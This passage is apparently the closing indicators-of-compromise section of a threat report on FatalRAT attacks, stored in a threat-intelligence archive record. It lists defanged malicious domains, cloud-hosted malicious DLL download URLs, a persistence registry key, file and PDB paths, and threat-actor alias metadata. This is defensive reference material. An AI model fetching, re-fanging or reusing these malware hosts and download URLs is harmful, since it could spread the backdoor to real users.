names\r\nmicrosoftmiddlename[.]tk\r\ncloudservicesdevc[.]tk\r\nnovadector[.]xyz\r\nmicrosoftupdatesoftware[.]ga\r\n0a305ffb2a1d41f6870eac02f9afce89[.]xyz\r\nxindajiema[.]info\r\nVip033324[.]xyz\r\nmicrosoftmiddlename[.]tk\r\ncloudservicesdevc[.]tk\r\nnovadector[.]xyz\r\nmicrosoftupdatesoftware[.]ga\r\n101.kkftodesk101[.]top\r\n102.kkftodesk102[.]top\r\n104.kkftodesk104[.]top\r\n105.kkftodesk105[.]top\r\n106.kkftodesk106[.]top\r\n107.kkftodesk107[.]top\r\n108.kkftodesk108[.]top\r\n109.kkftodesk109[.]top\r\n110.kkftodesk110[.]top\r\n34.kosdage[.]asia\r\nURLs of malicious files on legitimate services\r\nhttp://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae\r\nhttp://note.youdao[.]com/yws/api/note/1eaac14f58d9eff03cf8b0c76dcce913\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2auto.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAOtest.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nhttp://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll\r\nhttp://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll\r\nhttp://mytodesktest-1257538800.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nhttp://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before1/BEFORE.dll\r\nhttp://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before2/BEFORE.dll\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 36 of 37\n\nhttp://526-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nhttp://526-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll\r\nhttp://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll\r\nhttp://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://529-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll\r\nhttp://529-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll\r\nhttp://529-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nhttp://530-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nRegistry keys\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SVP7\r\nFile path\r\nC:\\ProgramData\\KnGoe\r\nC:\\user0\r\nC:\\ProgramData\\8877\r\nC:\\Windows\\nw_elf.dll\r\nC:\\Windows\\Fatal.key\r\nC:\\ProgramData\\jy.lnk\r\nPDB paths\r\nC:\\Users\\fangao\\Desktop\\unrar-tag-6.1.7\\build\\unrardll32\\Release\\UnRAR.pdb\r\nK:\\C++\\梵高远程管理客户端二号\\Release\\FANGAO.pdb\r\nK:\\C++\\梵高远程管理客户端二号\\Release\\BEFORE.pdb\r\nK:\\C++2010\\DLLrun\\DLLrunYoudao\\Release\\DLLrunYoudao.pdb\r\nK:\\C++\\DLL反射注入器四件套二号\\Release\\DLL运行器DLL版(wke.dll).pdb\r\nSystem objects\r\nUniqueMutexName – mutex name\r\nSource: https://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chai\r\nn-to-chinese-speaking-targets/\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 37 of 37", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/" ], "report_names": [ "fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets" ], "threat_actors": [ { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "8f68387a-aced-4c99-b2a6-aa85071a0ca3", "created_at": "2024-06-25T02:00:05.030976Z", "updated_at": "2026-04-10T02:00:03.656871Z", "deleted_at": null, "main_name": "Void Arachne", "aliases": [ "Silver Fox" ], "source_name": "MISPGALAXY:Void Arachne", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a7805d1a-b8d0-4a42-ae86-1d8711e0b2b9", "created_at": "2024-08-28T02:02:09.729503Z", "updated_at": "2026-04-10T02:00:04.967533Z", "deleted_at": null, "main_name": "Void Arachne", "aliases": [ "Silver Fox" ], "source_name": "ETDA:Void Arachne", "tools": [ "Gh0stBins", "Gh0stCringe", "HoldingHands RAT", "Winos" ], "source_id": "ETDA", "reports": null }, { "id": "55cc5d0d-d268-4f9d-8241-db957c3e02f3", "created_at": "2025-03-03T02:02:00.502379Z", "updated_at": "2026-04-10T02:00:04.83508Z", "deleted_at": null, "main_name": "Operation SalmonSlalom", "aliases": [], "source_name": "ETDA:Operation SalmonSlalom", "tools": [ "FatalRAT", "Sainbox RAT" ], "source_id": "ETDA", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775439046, "ts_updated_at": 1775792125, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e66c29589f2d77b18611624a8f1f7ac655ab133e.pdf", "text": "https://archive.orkl.eu/e66c29589f2d77b18611624a8f1f7ac655ab133e.txt", "img": "https://archive.orkl.eu/e66c29589f2d77b18611624a8f1f7ac655ab133e.jpg" } }